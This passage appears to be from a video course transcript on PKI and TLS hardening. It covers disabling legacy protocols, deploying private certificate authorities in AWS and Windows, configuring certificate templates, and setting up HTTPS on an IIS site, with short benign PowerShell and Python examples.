And in each of those, create the two DWORD values: DisabledByDefault with a value of 1, and Enabled with a value of 0. After rebooting my server, those protocols will no longer be supported, as evidenced if we were to run an nmap scan after setting those values and rebooting the server, which I have done.
[Video description begins] He switches to the dlachance@kali: ~ window. [Video description ends]
[Video description begins] He highlights the command: nmap -sV --script ssl-enum-ciphers -p 443
3.83.64.193. [Video description ends]
So we can now see if we run that same nmap command against the same host.
[Video description begins] In the output, he highlights "TLSv1.2:". [Video description ends]
When it enumerates the ciphers, the only thing it's going to report back in this case is TLS version 1.2.
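The registry changes made by hand above can also be scripted. Here's a hedged PowerShell sketch that creates the same SCHANNEL keys and values to disable SSL 3.0, TLS 1.0, and TLS 1.1 on the server side; a reboot is still required afterwards.

# Disable SSL 3.0, TLS 1.0 and TLS 1.1 server-side via the SCHANNEL registry keys (reboot required)
$base = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols'
foreach ($protocol in 'SSL 3.0', 'TLS 1.0', 'TLS 1.1') {
    $serverKey = Join-Path $base "$protocol\Server"
    New-Item -Path $serverKey -Force | Out-Null
    New-ItemProperty -Path $serverKey -Name 'DisabledByDefault' -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path $serverKey -Name 'Enabled' -Value 0 -PropertyType DWord -Force | Out-Null
}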
In this video, find out how to deploy a private CA using Amazon Web Services.
Objectives
PKI certificates are digital security certificates, and they are issued from a certificate authority, whether that certificate authority, or CA, is on premises or in the cloud. We're going to focus on cloud CAs here in Amazon Web Services.
[Video description begins] A web page called "AWS Management Console" is open. [Video description ends]
So, to get started here in the AWS Management Console, I've signed in with my AWS account. I'm going to
search for acm, that's the Certificate Manager. I'm going to click on it to open it up.
[Video description begins] He types the text, "acm" in a search box labeled "Find Services". The result of the
search contains an option labeled "Certificate Manager". He clicks the option and its corresponding page
opens. [Video description ends]
And what I want to do is I want to deploy a new certificate authority. So I'm going to go under Private
certificate authority. Now, this means that the certificates that will be generated are from my own certificate
authority. And that means by default, devices will not trust the validity of those certificates. Devices have lists
of public certification authorities whose certificates they would trust. Now, that list can be modified on
devices, but that's just the default behavior. Private certificate authority, I'm going to go ahead and click Get
started.
[Video description begins] A page called "Create CA" opens. It is divided into two parts. The first part
includes several steps. The second part is the content pane. In the first part, a step called "Step 1: Select CA
type" is selected and its corresponding page is open in the content pane. [Video description ends]
Now, I'm going to create a root certificate authority. That's the top of the PKI hierarchy. Now, if we already
had a Root CA, we could create a Subordinate CA for a different business unit that controls its own
certificates. Or maybe for a different part of the world, a different region, a different country. But here, I'm going to leave it on Root CA, and I'm going to click Next.
[Video description begins] In the first part, the next step called "Step 2: Configure CA subject name" is
selected and its corresponding page is open in the content pane. [Video description ends]
Then I have to fill in some values, such as the name of the Organization, an organization unit, Country name,
State or province, and so on. So I'm going to go ahead and fill that out. So now that I filled in all the details,
including the common name for the CA. I'm calling it PrivateCA1. I'm going to go ahead and click Next. I'll
accept the default key algorithm, RSA 2048-bit and I'll click Next.
[Video description begins] In the first part, the next step called "Step 3: Configure CA key algorithm" is
selected and its corresponding page is open in the content pane. [Video description ends]
I'm not going to configure a certificate revocation list, or CRL, sometimes pronounced "curl".
[Video description begins] In the first part, the next step called "Step 4: Configure revocation" is selected and
its corresponding page is open in the content pane. [Video description ends]
And I could add a tag, a sort of metadata. I'm going to add name and I'm going to call it PrivateCA1.
[Video description begins] He enters the text, "Name" in a text box labeled "Tag name". He then enters the
text, "PrivateCA1" in another text box labeled "Value". [Video description ends]
So it shows up that way when I view it here in the Amazon Web Services interface.
[Video description begins] He clicks a button labeled "Next". In the first part, the next step called "Step 6:
Configure CA permissions" is selected and its corresponding page is open in the content pane. [Video
description ends]
[Video description begins] He points to a radio button labeled "Authorize ACM to use this CA for renewals",
which is preselected. [Video description ends]
Certificates have an expiration date, so I want to be able to renew them with the CA. I'll click Next.
[Video description begins] In the first part, the next step called "Step 7: Review" is selected and its
corresponding page is open in the content pane. [Video description ends]
And on the summary screen, I'm happy with this. So I'm just going to click here to confirm that I might be
charged a monthly fee, and I'll choose Confirm and create.
[Video description begins] He clicks a button labeled "Confirm and create". [Video description ends]
[Video description begins] A notification window opens, which includes the text, "Success! Your CA was
created successfully". It also includes a button labeled "Get started". [Video description ends]
It says, your CA was created successfully. Okay, well, I can click Get started.
[Video description begins] A page called "Install root CA certificate" opens. It is divided into two parts. The
first part contains two steps. The second part is the content pane. A step called "Step 1: Configure CA
Certificate" is selected in the first part and its corresponding page is open in the content pane. [Video
description ends]
And here, I can see the CA certificate parameters. So the validity is going to be for 10 years, okay? I can see
the signature algorithm here is SHA256WITHRSA, for digitally signing certificates that are issued from this
CA. I'm okay with both of these.
[Video description begins] He clicks a button labeled "Next". In the first part, the next step called "Step 2:
Review" is selected and its corresponding page is open in the content pane. [Video description ends]
So I'm just going to continue on to click next and confirm and install, to make sure that my private root CA is
ready to go.
[Video description begins] He then clicks a button labeled "Confirm and install". A page called “Private CAs”
opens. [Video description ends]
In this video, learn how to generate a server certificate from an Amazon Web Services Certificate Authority.
Objectives
[Video description begins] Topic title: Cloud PKI Certificate Issuance. The presenter is Dan Lachance. [Video
description ends]
There are a lot of different tools and methods by which you can acquire a PKI certificate. In this example, I'm
going to be requesting a private certificate from a cloud based private certificate authority. Specifically through
Amazon Web Services or AWS.
[Video description begins] The AWS Management Console web page is open. [Video description ends]
I've already got the CA, the certificate authority that issues certificates, deployed. Let's go
take a look at it. So here in the AWS Management Console, I'm going to search for acm, and in the search
results, I'll click Certificate Manager.
[Video description begins] The corresponding page opens. [Video description ends]
On the left, if I go to Private CAs, indeed there's PrivateCA1 for the quick 24x7 organization, and its status is listed as active.
[Video description begins] In the navigation pane, he selects the Private CAs option and its corresponding
page opens in the content pane. [Video description ends]
It's a Root CA, so it's at the very top of the PKI hierarchy. If I go to Certificate Manager over on the left, I can
click Get started and I can request either a public certificate issued by Amazon.
[Video description begins] In the navigation pane, he selects an option called “Certificate manager” and its
corresponding page opens in the content pane. A page called "Request a certificate" opens. [Video description
ends]
I don't want that, I want to request a private certificate issued by my CA. Now understand that when you
Request a private certificate for security purposes, let's say for a website, that certificate isn't going to be
trusted by anyone visiting that website. And that's because it will have been issued from a private certificate
authority which anyone can do, so where's the security? However, that's fine. We can configure devices to trust
certificates issued from a private CA if we so choose.
[Video description begins] He selects a radio button called “Request a private certificate”. [Video description
ends]
To request a private certificate, I'm going to click Request a certificate, and then I choose the CA from the list.
[Video description begins] A page called "Request a private certificate" opens. It is divided into two parts. The
first part includes several steps. The second part is the content pane. In the first part, a step called "Step 1:
Select CA" is selected and its corresponding page is open in the content pane. He clicks a drop-down list box
labeled "CA" and a drop-down list opens. [Video description ends]
[Video description begins] In the first part, the next step called "Step 2: Add domain names" is selected and its
corresponding page is open in the content pane. [Video description ends]
Now for the domain name here, let's say I want to secure a site, www.fakesite1.com, and then I'll click Next.
[Video description begins] In the first part, the next step called "Step 3: Add Tags" is selected and its
corresponding page is open in the content pane. [Video description ends]
And I can add some metadata here, some tags, so the name will be FakeSite1, and then I'll click Review and
request and Confirm and request.
[Video description begins] He enters the text, "Name" in a text box labeled "Tag Name". He then enters the
text, "FakeSite1" in a text box labeled "Value". [Video description ends]
Now at this point in the Certificate Manager view on the left, we can now see we've got a certificate issued for
our site.
[Video description begins] In the first part, the next step called "Step 4: Review and request" is selected and
its corresponding page is open in the content pane. [Video description ends]
[Video description begins] He clicks a button labeled "Confirm and request". A page called “Certificates”
opens. [Video description ends]
So we can go ahead and select that by putting a check mark in the box on the left.
[Video description begins] He points to the certificate and the site. [Video description ends]
And under Actions, we can export the private certificate part of that and protect it with a passphrase if we so
choose.
[Video description begins] He clicks a drop-down button labeled "Actions", which includes options labeled
"Delete" and "Export (private certificates only)". [Video description ends]
But if we're going to be using that certificate within Amazon Web Services, then we really don't have to do
anything.
[Video description begins] He selects the Export (private certificates only) option and its corresponding page
opens. [Video description ends]
We don't have to export anything because we'll be able to select it from a list.
In this video, find out how to deploy a private CA using Microsoft Certificate Services.
Objectives
[Video description begins] Topic title: On-premises Certificate Authority Deployment. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I will be installing and deploying a private CA, a certificate authority, in Windows using
Active Directory Certificate Services. So, to get started here in Windows Server 2019, we can either go the
way of PowerShell command line, so for example, Windows PowerShell.
[Video description begins] He opens a window called "Administrator: Windows PowerShell". The prompt "PS
C:\Users\Administrator>" is displayed. [Video description ends]
And here, I could, for example, get-windowsfeature, and I could ask it, let's say with wildcards around it, for
ADCS, Active Directory Certificate Services.
[Video description begins] He executes the following command: get-windowsfeature *adcs*. The output
displays a list of features available for ADCS. [Video description ends]
And I can see that all of the components that are available for Active Directory Certificate Services are shown
here, but there's no X in the box, so it's not installed. So I could use either the add-windowsfeature or install-windowsfeature cmdlet, it doesn't matter which one, and specify the names of the components that I wish to install here in PowerShell, and whether I want to include the Management Tools.
[Video description begins] In the output, he highlights "ADCS-Cert-Authority" and "ADCS-Enroll-Web-
Pol". [Video description ends]
But I could also do this through the Server Manager GUI. So from the Start menu, I'll click on Server
Manager. Basically, I can add the ADCS, Active Directory Certificate Services, role.
[Video description begins] A window called "Server Manager" opens. [Video description ends]
[Video description begins] A wizard called "Add Roles and Features Wizard" opens. A page called "Before
you begin" is open in the wizard. [Video description ends]
So I'm going to click Add roles and features, just going to go through the first couple of screens in the wizard,
accepting defaults until I get to Roles.
[Video description begins] He clicks a button labeled "Next" for the first few pages. A page called "Select
server roles" opens. [Video description ends]
[Video description begins] A dialog box labeled "Add Roles and Features Wizard" opens. [Video description
ends]
And it says, well, what about the Remote Server Admin Tools? Yeah, I want those too. So, I'll click Add
Features, and Next.
[Video description begins] A page called "Select features" opens in the wizard. [Video description ends]
[Video description begins] He clicks the Next button and a page called "Active Directory Certificate Services"
opens. He again clicks the Next button and a page called "Select role services" opens. [Video description ends]
All I really want is the Certification Authority. I do have some other options like Certification Authority Web
Enrollment, and so on, but I don't want those, just the Certification Authority piece.
[Video description begins] In the page, he points to a checkbox labeled "Certification Authority", which is
preselected. [Video description ends]
[Video description begins] He clicks the Next button and a page called "Confirm installation selections"
opens. He again clicks the Next button and a page called "Installation progress" opens. [Video description
ends]
And we can see that the installation has now begun. Okay, before you know it, the feature is installed, so I'm
going to go ahead and click Close. Now, this is great because we could establish our own PKI hierarchy to
issue digital security certificates to help harden our environment, if we're not already doing this. Certificates
might be issued to users or devices to authenticate to a VPN, to encrypt files, to secure connectivity to web
apps, you name it. So, now that we've got that installed, if I go to the Tools menu, we now have a Certification Authority option. You can also launch that from your Start menu.
[Video description begins] He clicks an option called “Certification Authority”. A message box opens. [Video
description ends]
Now, of course, we get this message initially. It says, well, I can't manage Active Directory Certificate Services, file not found. Okay, no problem.
[Video description begins] He clicks a button labeled "OK" and a window called "certsrv - [Certification
Authority (Local)]" opens. [Video description ends]
So it still opens up the console. Now, we don't have it configured, so there's nothing to show here in the
console, which is why it spawned that error message.
So we need to deploy a new CA. That's what this little icon is up here in the notifications area in Server
Manager up by the flag. So if I click there it says, there's a Post-Deployment Configuration, you need to
configure Active Directory Certificate Services.
[Video description begins] He points to a link labeled "Configure Active Directory Certificate Services on the
destination server". [Video description ends]
Of course we do, we can't launch the tool until there's a CA. So I'm going to go ahead and click on that.
[Video description begins] He clicks the link and its corresponding wizard opens. It is divided into two parts.
The first part includes several steps. The second part is a content pane. A step labeled "Credentials" is
selected in the first part and its corresponding page is open in the content pane. [Video description ends]
And it looks like we've got the default admin credentials for this host filled in there, that's good.
[Video description begins] He highlights the text, "EC2AMAZ-E5M0CTT\Administrator" in a text box labeled
"Credentials". [Video description ends]
[Video description begins] The next step called "Role Services" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
I'm going to select Certification Authority, so we can proceed to configure that. Now we can't have an
Enterprise CA, because the server needs to be a member of an Active Directory domain.
[Video description begins] He clicks a button labeled "Next". The next step called "Setup Type" is selected in
the first part and its corresponding page is open in the content pane. [Video description ends]
We don't have an Active Directory domain, so it's going to need to be a Standalone CA. That's fine, I'll click
Next.
[Video description begins] The next step called "CA Type" is selected in the first part and its corresponding
page is open in the content pane. [Video description ends]
You can't have a subordinate CA until you've got a root. So we're going to start off with Root, here. That's all
we're going to use.
[Video description begins] The next step called "Private Key" is selected in the first part and its corresponding
page is open in the content pane. [Video description ends]
[Video description begins] He points to a radio button labeled "Create a new private key", which is
preselected. [Video description ends]
Now, remember, the CA's private key is what gets used with a hashing algorithm, like SHA256, to digitally
sign the certificates that it issues.
[Video description begins] The next step called "Cryptography" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
Fine, having said that, let's click Next, SHA256, all good, that's normal.
[Video description begins] He clicks the Next button. The next step called "CA Name" is selected in the first
part and its corresponding page is open in the content pane. [Video description ends]
Now we have to give a name to the CA. So I'm going to call this CA1. And then I'm going to click Next.
[Video description begins] The next step called "Validity Period" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
The validity period for the CA certificate will be 5 years. So within that 5-year period, I need to renew it. Your organization's policy on how PKIs should be configured will determine whether you leave that at 5 years, increase it to 10 years, or reduce it, whatever the case might be. I'm going to keep the default of 5 years, and I'll click Next.
[Video description begins] The next step called "Certificate Database" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
Same on the database locations, Next, again, and we've got the summary screen.
[Video description begins] The next step called "Confirmation" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
[Video description begins] The next step called "Progress" is selected in the first part and its corresponding
page is open in the content pane. [Video description ends]
Okay, now let's go back to the Tools menu, but this time it's going to work.
[Video description begins] He clicks a button labeled "Close" and the wizard closes. [Video description ends]
We're going to choose Certification Authority. It's not going to squawk about file not found because we have a
CA.
[Video description begins] The certsrv - [Certification Authority (Local)] window opens. It is divided into two
parts. The first part is a navigation pane, which includes a root node labeled "Certification Authority (Local)"
and a node labeled "CA1". The second part is a content pane. [Video description ends]
[Video description begins] He expands the CA1 node. It includes several folders. [Video description ends]
Now, from here, we would see any issued certificates, or anything like that. But we don't have that yet, because all we've done at this point is deploy a private CA using Active Directory Certificate Services.
[Video description begins] Topic title: On-premises Certificate Templates. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'm going to configure a Microsoft certificate services template. As you might guess, a
template is used as a blueprint for the issuing of certificates that have specific configurations. So on my server,
I'm going to go to the start menu, and I'm going to go down under Windows Administrative Tools. And I'm
going to launch the Certification Authority tool. I've already configured a Certificate Authority, a CA.
[Video description begins] The certsrv - [Certification Authority (Local)] window opens. [Video description
ends]
Specifically, this one is an enterprise CA. What that means is that, this server is joined to an Active Directory
domain.
[Video description begins] In the navigation pane, he points to the CA1 node. [Video description ends]
And if you want to work with templates, you're going to need to do that because if you set up a standalone CA,
or a server not joined to a domain, you won't see Certificate Templates here.
[Video description begins] He expands the CA1 node and points to a folder labeled "Certificate
Templates". [Video description ends]
Now when I go to Certificate Templates, I can see the ones that have been made available for use when certificates get issued.
[Video description begins] He selects the Certificate Templates folder. The corresponding templates are
displayed in the content pane. He then points to the templates. [Video description ends]
But what I want to do is get a master list of all possible Certificate Templates. So I'm going to right-click on
Certificate Templates and choose Manage which is going to open a new console screen.
[Video description begins] A window called "Certificate Templates Console" opens. It displays a list of
templates. [Video description ends]
Here we have the master list I was referring to, for example, I've got a Web Server template.
[Video description begins] He highlights a template labeled "Web Server". [Video description ends]
So what you do when you want to customize this is you right-click on a template and you duplicate it, and you
make changes to it.
[Video description begins] A shortcut menu opens, which includes an option labeled "Duplicate
Template". [Video description ends]
So for example, under General, I'm going to call it Custom Web Server.
[Video description begins] He clicks the Duplicate Template option and its corresponding dialog box
opens. [Video description ends]
Maybe I want the validity period to be only one year for certificates that are issued by this particular template.
[Video description begins] He selects a tab labeled "General". [Video description ends]
I am going to change that to a 1. And we can also specify a number of other details. So, for example, under
Cryptography, we can determine the Minimum key size.
[Video description begins] He selects a tab labeled "Cryptography". [Video description ends]
The subject name: how that's specified, whether it's supplied in the request, or
[Video description begins] He selects a tab labeled "Subject Name". [Video description ends]
So maybe built from the DNS name of the server in Active Directory.
[Video description begins] He selects a radio button labeled "Build from this Active Directory information"
and then clicks a drop-down list box labeled "Subject name format". A drop-down list opens. [Video
description ends]
So we can do that; we can specify how the name will be generated for the subject.
[Video description begins] From the drop-down list, he selects an option labeled "DNS name". [Video
description ends]
[Video description begins] He selects a checkbox labeled "DNS name". [Video description ends]
So once we've configured all of that in the custom template, there it is listed. But what we would do is close out of the Certificate Templates console, which puts us back in just the Certification Authority tool.
[Video description begins] He clicks a button labeled "OK" and the dialog box closes. A new template labeled
"Custom Web Server" is added in the list. [Video description ends]
But we don't see the new template here, because we need to right-click on Certificate Templates, and we need to choose New, Certificate Template to Issue.
[Video description begins] He points to the list of templates. [Video description ends]
[Video description begins] A dialog box labeled "Enable Certificate Templates" opens. [Video description
ends]
I'll click OK, and now Custom Web Server shows up.
[Video description begins] He selects an option labeled "Custom Web Server". [Video description ends]
So now in addition to these other templates, the Custom Web Server template will be available when a certificate is requested from the CA1 Certification Authority.
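As a side note, the same publish-for-issuance step can be scripted with the ADCSAdministration module; this is a hedged sketch, and the template's short name shown here is a hypothetical example.

# List templates currently assigned to the CA for issuance
Get-CATemplate

# Assign the duplicated template to the CA (template short name is a hypothetical example)
Add-CATemplate -Name 'CustomWebServer'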
[Video description begins] Topic title: On-premises PKI Certificate Issuance. The presenter is Dan
Lachance . [Video description ends]
Windows computers that are joined to an Active Directory domain can be configured for certificate auto
enrollment through group policy. So in other words, they get certificates issued based on the settings in the
policy and you don't have to do anything other than configure it initially. However, you can also request a
certificate manually from a CA, which is what I'll be doing in this example. So on my server, I'm going to go
to a Command Prompt. I'm going to make sure I run that as an administrator so that it's an elevated command
prompt.
[Video description begins] The Administrator: Command Prompt window opens. The prompt "C:\Users\
Administrator>" is displayed. [Video description ends]
[Video description begins] A window called "Console1 - [Console Root]" opens. It is divided into two parts.
The first part is a navigation pane, which contains a root folder labeled "Console Root". The second part is a
content pane. [Video description ends]
From which I'll then go to File, Add/Remove Snap-in. Snap-ins, of which there are many, allow you to manage
some aspect of a Windows environment, including certificates.
[Video description begins] A dialog box labeled "Add or Remove Snap-ins" opens. [Video description ends]
[Video description begins] A wizard opens in which a page called "Certificates snap-in" is open. [Video
description ends]
[Video description begins] He selects a checkbox labeled "Computer account". [Video description ends]
It's going to be for the local computer, so I will go through that and click OK.
[Video description begins] A page called "Select Computer” opens. He clicks a button labeled
"Finish". [Video description ends]
And now, Certificates for local computer shows up here in the left-hand navigator.
[Video description begins] A folder labeled "Certificates (Local Computer)" is added in the Console Root
folder. [Video description ends]
All I see here is CA1, because the computer on which I'm doing this is actually the server where the authority, the CA, was configured. But I don't have a computer certificate.
[Video description begins] He clicks a subfolder labeled "Certificates" in the Personal subfolder and its
details are displayed in the content pane. [Video description ends]
So I'm going to request one. I'm going to right-click on Certificates, choose All Tasks, Request New
Certificate. Next, Active Directory Enrollment Policy, okay, Next.
[Video description begins] A wizard called "Certificate Enrollment" opens. [Video description ends]
Now from here, I can see all of the templates that are available. And if I have any custom templates that I've
created, they may not show up here if the appropriate permissions were not set. For example, I have a custom
template called custom web server, but it's not showing up. Even if I choose Show all templates, I'm not going
to see it. Okay, what's the problem?
[Video description begins] The certsrv - [Certification Authority (Local)] window opens. [Video description
ends]
Well, let's Cancel out of here and let's fire up under Windows Administrative Tools from the Start menu, the
Certification Authority tool. And then in there, I can see CA1,
[Video description begins] In the navigation pane, he expands the CA1 node. [Video description ends]
[Video description begins] The Certificate Templates Console window opens. [Video description ends]
And I'm going to take a look at the Custom Web Server certificate here.
[Video description begins] He double-clicks the Custom Web Server template and its corresponding dialog
box opens. He selects a tab called “Security”. [Video description ends]
Because in the Security section, we need to make sure that we've got the ability to enroll. So notice that Authenticated Users here has Read but not Enroll. Now, we're not talking about Autoenrollment through group
policy, just manual enrollment. So I'm going to turn on Enroll for Authenticated Users. Because that also
includes servers that are authenticated to Active Directory.
[Video description begins] He selects a checkbox labeled “Allow” for an option labeled “Enroll”. [Video
description ends]
And in this case, I'll click OK. Now let's flip back into what we were doing.
[Video description begins] He switches to the Console1 window in which the Certificates subfolder is
selected. [Video description ends]
We were in the midst of right-clicking here in our MMC snap-in. For Certificates: All Tasks, Request New
Certificate, Next, and Next.
[Video description begins] The Certificate Enrollment wizard opens. [Video description ends]
There's Custom Web Server because the enroll permission is now enabled. Perfect, okay, that's what I want.
I'm going to choose that check mark and click Enroll.
[Video description begins] In a section labeled "Active Directory Enrollment Policy", he selects a checkbox
labeled "Custom Web Server". [Video description ends]
[Video description begins] He clicks a button labeled "Finish" and the wizard closes. In the content pane, a
certificate labeled "EC2AMAZ-E5M0CTT.Domain1.Local" is added. [Video description ends]
Well, it's supposed to be. So we can see here that we've got a certificate issued to this server's name. That's the
fully qualified DNS name of this host issued by a CA called CA1.
So now, if I were to double click, let's say to take a look here, what's the purpose of the certificate?
[Video description begins] The corresponding dialog box opens. [Video description ends]
Ensures the identity of a remote computer. We can also see the validity here is only up to one year. And that
would come from the template that defines settings such as that. So at this point, we have successfully issued
an on-premises PKI certificate. And in this case, it's from a private CA with a custom template.
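For reference, a manual request like this can also be made from PowerShell with the PKI module's Get-Certificate cmdlet, assuming the machine is domain-joined and the template allows enrollment; the template name here is a hypothetical example.

# Request a certificate from the enterprise CA (template name is a hypothetical example)
Get-Certificate -Template 'CustomWebServer' -CertStoreLocation Cert:\LocalMachine\My

# Confirm the issued certificate landed in the local machine Personal store
Get-ChildItem Cert:\LocalMachine\My | Select-Object Subject, Issuer, NotAfter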
In this video, you will configure a Microsoft IIS web site to use a PKI certificate.
Objectives
[Video description begins] Topic title: HTTPS On-premises Web Site. The presenter is Dan Lachance. [Video
description ends]
Most modern web applications use an HTTPS connection to secure the link between a client connecting to the
app and the server itself over the internet. This is normally done with a PKI certificate instead of a VPN tunnel.
And so a PKI certificate is then assigned to that particular application, a web app, for example, and away we go. We just want to make sure that the network security protocol being used is secure. We don't want to use SSL, and we don't want to use anything less than TLS version 1.2, because they are known to have vulnerabilities.
So let's get started here configuring an HTTPS connection for a Windows IIS website. First of all on my
Windows host, I'm just going to fire up the default page here on the localhost where the web server is running,
and indeed we see it is working.
[Video description begins] He opens a web browser and then enters a URL "http://localhost/" in the address
bar. A web page called "IIS Windows Server" opens. [Video description ends]
Now that's over HTTP. If we try to do an HTTPS secured connection, it's just going to time out because we don't have that binding configured.
[Video description begins] The Administrator: Command Prompt window opens. The prompt "C:\Users\
Administrator>" is displayed. [Video description ends]
[Video description begins] He executes the following command: mmc. No output returns and the Console1 -
[Console Root] window opens. [Video description ends]
Let's go into a command prompt here, so CMD I'm going to right-click and make sure I run it as admin.
And I'm going to run MMC, Microsoft Management Console where I'm going to go to File, Add/Remove
Snap-ins, Certificates, we'll just add that for the computer and I'll accept the rest of the defaults.
[Video description begins] The Add or Remove Snap-ins dialog box opens. [Video description ends]
And basically what I'm doing is drilling down under Certificates, Personal, Certificates to ensure that we have
a server authentication certificate that we can use.
[Video description begins] He selects an option called “Certificates” in a section called “Available snap-
ins”. He then clicks a button labeled "Add >". A wizard opens in which a page called "Certificates snap-in" is
open. He selects a checkbox labeled "Computer account". [Video description ends]
[Video description begins] He clicks a button labeled "Next" and another page opens in the wizard. He then
clicks a button labeled "Finish" and the wizard closes. He then clicks a button labeled "OK" and the dialog
box closes. In the navigation pane, the Certificates (Local Computer) folder is added in the root folder
"Console Root". [Video description ends]
That's a certificate authority and it's got the name of this host, the DNS name of this host.
[Video description begins] In the navigation pane, he selects a subfolder labeled "Certificates" and its details
open in the content pane. [Video description ends]
So now I'm going to go into the start menu under Microsoft, or rather under Windows Administrative Tools.
[Video description begins] He opens a window called "Internet Information Services (IIS) Manager". It is
divided into two parts. The first part is a navigation pane, which includes a root node labeled "Start Page".
The second part is a content pane. [Video description ends]
And I'm interested in Internet Information Services IIS. IIS Manager lets you manage aspects of your Web
Server installation here in Windows.
[Video description begins] He expands a node labeled "EC2AMAZ-E5M0CTT" under the Start Page root
node. The EC2AMAZ-E5M0CTT node includes a subnode labeled "Sites". [Video description ends]
So if I go down to Sites, there's the default site. That's great, no problem. However, we want to enable our site
for HTTPS communications.
[Video description begins] A dialog box labeled "Site Bindings" opens. [Video description ends]
So the first thing I'm going to do is right-click on the Default Web Site, and I'm going to choose Edit Bindings,
we've got a binding for Port 80.
[Video description begins] A dialog box labeled "Add Site Binding" opens. [Video description ends]
So that's HTTP and that's fine. However, I'm going to click Add, I want to add https, and I've got to specify the
host name.
[Video description begins] He clicks a drop-down list box labeled "Type" and a drop-down list opens, which
includes an option labeled "https". He then selects the option. [Video description ends]
And I also have to choose a certificate and there's the certificate that we were just looking at.
[Video description begins] He clicks a drop-down list box labeled "SSL certificate" and a drop-down list
opens, which includes an option labeled "EC2AMAZ-E5M0CTT.Domain1.Local". He then selects the
option. [Video description ends]
And if we view the certificate, we can see it was issued by CA1 and so on.
[Video description begins] He clicks a button labeled "View" and its corresponding dialog box opens. [Video
description ends]
[Video description begins] He points to the text, "CA1" adjacent to a field called “Issued by” and then points
to the text, "EC2AMAZ-E5M0CTT.Domain1.Local" adjacent to a field called "Issued to". [Video description
ends]
So at this point, I'm going to leave it on All Unassigned IP addresses, Port 443 is what we want. So that's a
good thing.
[Video description begins] The Add Site Binding dialog box closes. [Video description ends]
I'm going to go ahead and click OK. We now have a binding on 443.
[Video description begins] He clicks a button called "Close" and the Site Bindings dialog box closes. [Video
description ends]
And that should be it. So let's go back into our web browser, where we were testing https connectivity to that
web server. Now this time it's working.
[Video description begins] He enters the URL "https://localhost/". [Video description ends]
It's saying this site is not secure, and you might assume that's because the certificate was issued from a private
CA, an internal certificate authority.
[Video description begins] A dialog box labeled "Internet Options" opens. [Video description ends]
If I were to go to ALT+T for Tools and go into Internet Options here in my browser.
[Video description begins] He clicks a button called “Certificates” and a dialog box labeled "Certificates"
opens. In the dialog box, a tab labeled "Personal" is open. [Video description ends]
If I were to go under Content and if I were to take a look at Certificates, we can see trusted root certificates.
[Video description begins] In the Certificates dialog box, he selects a tab labeled "Trusted Root Certification
Authorities". It contains various certificates. [Video description ends]
These are the certificate authorities that will be trusted. So what we have to make sure of is that we've got trust
established for certificates coming from CA1.
[Video description begins] He clicks a button labeled "Close" and the Certificates dialog box closes. [Video
description ends]
And that means we would have to make sure that we import the CA1 trusted root certificate, which has
been done.
[Video description begins] He clicks a button labeled "OK" and the Internet Options dialog box closes. [Video
description ends]
[Video description begins] He switches to the Console1 window in which the Certificates subfolder is
selected. [Video description ends]
We might wonder then, wait a minute, why is it saying the site is not secure?
Well, that's because I'm connecting to localhost, which is not the name in the certificate.
[Video description begins] He points to the text, "EC2AMAZ-E5M0CTT.Domain1.Local" adjacent to the field
called "Issued to". [Video description ends]
The name in the certificate is this long example of a name for the server.
[Video description begins] In the dialog box, he selects a tab labeled "Details". It includes a table with several
rows and two column headers. It also includes a text box. [Video description ends]
[Video description begins] He selects the row with row entries labeled "Subject" and "EC2AMAZ-
E5M0CTT.Domain1.Local". The text, "CN = EC2AMAZ-E5M0CTT.Domain1.Local" is displayed in the text
box. [Video description ends]
So what I'm going to do is just highlight that, the actual DNS name the certificate was issued to.
[Video description begins] He clicks a button labeled "OK" and the dialog box closes. [Video description
ends]
We're going to go back into our browser, and we're going to test https connectivity to it.
You need to make sure that that name resolves to the correct IP, which it does here, and notice we get a
seamless https connection now to the web site.
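As a quick aside, you can check which name a server's certificate presents without using a browser. Here's a minimal Python sketch, assuming the demo server name used above (swap in your own host); if you connect using a name that doesn't match the certificate, such as localhost, the TLS handshake fails with a certificate error, which is exactly what the browser warning was telling us.

    # Minimal sketch: connect over TLS and print the certificate's subject and issuer.
    import socket
    import ssl

    host = "EC2AMAZ-E5M0CTT.Domain1.Local"  # name from this demo; replace as needed

    context = ssl.create_default_context()
    # For a private/internal CA, you'd also load its root certificate, for example:
    # context.load_verify_locations("ca1-root.cer")   # hypothetical file name

    with socket.create_connection((host, 443), timeout=5) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
            print("Subject:", cert.get("subject"))
            print("Issuer:", cert.get("issuer"))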
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the use of cryptographic solutions, such as Public Key Infrastructure, PKI,
which deals with encryption and hashing, to secure IT systems and data. We did this by exploring the
components of a PKI hierarchy and how cryptography protects sensitive data. We looked at how to protect
data at rest using EFS, BitLocker encryption and Linux Filesystem encryption. We looked at how to configure
custom encryption keys for cloud storage.
We covered the importance of hashing and how to generate file hashes on Windows and Linux file systems, including how
to download and verify a checksum hash for a Kali Linux download. We took a look at the steps in the PKI
certificate life cycle and how SSL and TLS are used for securing network traffic. We talked about certificate
authorities, including cloud and on-premises CA deployment and PKI certificate issuance. And finally, we
looked at how to configure a Microsoft IIS web site with a PKI certificate. In our next course, we'll move on to
explore how to secure hardware through firmware updates and device configuration on isolated networks. And
we'll also examine SCADA and IoT.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. The presenter is Dan Lachance, an IT Trainer /
Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+
certification exam is designed for IT professionals looking to gain security analyst skills to perform data
analysis to identify vulnerabilities, threats, and risks to an organization, to configure and use threat detection
tools, and to secure and protect an organization's applications and systems.
In this course, we're going to explore security as it relates to hardware, including applying firmware updates,
